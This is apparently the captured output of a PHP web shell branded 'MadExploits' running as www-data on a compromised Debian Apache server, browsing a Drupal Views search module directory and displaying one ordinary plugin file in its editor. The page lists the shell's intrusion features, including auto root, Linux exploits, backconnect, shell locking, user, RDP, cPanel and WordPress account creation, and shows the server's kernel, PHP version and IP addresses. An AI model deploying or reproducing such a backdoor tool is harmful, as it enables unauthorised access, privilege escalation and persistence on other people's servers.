Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.226.170.19
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_argument_search....
3.32
KB
-rw-r--r--
views_handler_field_search_sco...
2.83
KB
-rw-r--r--
views_handler_filter_search.in...
7.2
KB
-rw-r--r--
views_handler_sort_search_scor...
1.06
KB
-rw-r--r--
views_plugin_row_search_view.i...
834
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_plugin_row_search_view.inc
<?php /** * @file * Definition of views_plugin_row_search_view. */ /** * Plugin which performs a node_view on the resulting object. */ class views_plugin_row_search_view extends views_plugin_row { function option_definition() { $options = parent::option_definition(); $options['score'] = array('default' => TRUE, 'bool' => TRUE); return $options; } function options_form(&$form, &$form_state) { $form['score'] = array( '#type' => 'checkbox', '#title' => t('Display score'), '#default_value' => $this->options['score'], ); } /** * Override the behavior of the render() function. */ function render($row) { return theme($this->theme_functions(), array( 'view' => $this->view, 'options' => $this->options, 'row' => $row )); } }
Close